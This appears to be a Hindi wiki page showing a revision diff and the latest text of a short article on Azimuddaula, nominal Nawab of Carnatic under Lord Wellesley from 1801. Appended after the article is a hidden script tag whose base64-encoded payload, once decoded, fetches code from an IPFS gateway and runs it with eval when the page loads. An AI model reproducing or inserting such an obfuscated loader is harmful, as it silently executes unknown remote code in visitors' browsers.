Difference between revisions of "अजीमुद्दौला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*अजीमुद्दौला को 1801 ई. में [[गवर्नर जनरल]] लार्ड वेलेजली (1798-1805 ई.) द्वारा [[कर्नाटक]] का नाम मात्र के लिए नवाब बनाया गया और उसे पेंशन दी।
+
'''अजीमुद्दौला''' को 1801 ई. में [[अंग्रेज़]] [[गवर्नर-जनरल]] [[लॉर्ड वेलेज़ली]] (1798-1805 ई.) द्वारा [[कर्नाटक]] का नाम मात्र के लिए नवाब बनाया गया था।
*कर्नाटक का पूरा नागरिक और सैनिक प्रशासन [[ईस्ट इंडिया कम्पनी]] ने अपने हाथों में ले लिया था और बाद में पूरे क्षेत्र को ब्रिटिश भारतीय साम्राज्यों में मिला लिया गया।
 
  
{{प्रचार}}
+
*कर्नाटक का पूरा नागरिक और सैनिक प्रशासन [[ईस्ट इंडिया कम्पनी]] ने अपने हाथों में ले लिया था।
{{लेख प्रगति
+
*वेलेज़ली ने अजीमुद्दौला को नवाब बनाकर पूरे कर्नाटक क्षेत्र को ब्रिटिश भारतीय साम्राज्य में मिला लिया।
|आधार=आधार1
+
*अजीमुद्दौला केवल नाममात्र का ही नवाब था और अंग्रेज़ सरकार की पेंशन पर आश्रित था।
|प्रारम्भिक=
+
 
|माध्यमिक=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
 +
[[Category:इतिहास_कोश]]
 +
[[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]]
 
__INDEX__
 
__INDEX__
[[Category:इतिहास_कोश]]
 
[[Category:औपनिवेशिक काल]]
 

Latest revision as of 13:23, 18 May 2012

ajimuddaula ko 1801 ee. mean aangrez gavarnar-janaral l aaurd velezali (1798-1805 ee.) dvara karnatak ka nam matr ke lie navab banaya gaya tha.

  • karnatak ka poora nagarik aur sainik prashasan eest iandiya kampani ne apane hathoan mean le liya tha.
  • velezali ne ajimuddaula ko navab banakar poore karnatak kshetr ko british bharatiy samrajy mean mila liya.
  • ajimuddaula keval namamatr ka hi navab tha aur aangrez sarakar ki peanshan par ashrit tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>